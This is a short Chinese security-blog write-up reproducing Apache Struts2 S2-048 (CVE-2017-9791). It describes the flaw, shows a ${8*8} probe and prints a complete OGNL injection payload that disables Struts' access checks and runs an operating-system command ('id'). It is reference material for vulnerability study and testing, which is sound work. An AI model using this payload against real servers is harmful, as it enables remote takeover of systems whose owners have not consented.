官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
【漏洞复现】Struts2 S2-048 远程命令执行漏洞 (CVE-2017-9791)
我是废物- 关注
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
【漏洞复现】Struts2 S2-048 远程命令执行漏洞 (CVE-2017-9791)
【漏洞复现】Struts2 S2-048 远程命令执行漏洞 (CVE-2017-9791)
@[TOC]
漏洞介绍
描述:Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。 攻击者构造恶意字段值(value)通过Struts2的struts2-struts1-plugin传递给被攻击主机,从而实现RCE,获取远程主机的控制权限。
poc
访问漏洞存在的路径 /integration/saveGangster.action
点击Submit提交后发现${8*8}被执行。
exp
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())).(#q)}
扫描工具
Yakit
本文为 我是废物 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
我是废物 LV.5
这家伙太懒了,还未填写个人描述!
- 10 文章数
- 7 关注者
内网穿透(nc)
2023-10-11
【漏洞复现】shiro 反序列化 (CVE-2016-4437)
2023-08-17
攻防世界web篇之Web_php_include
2023-08-17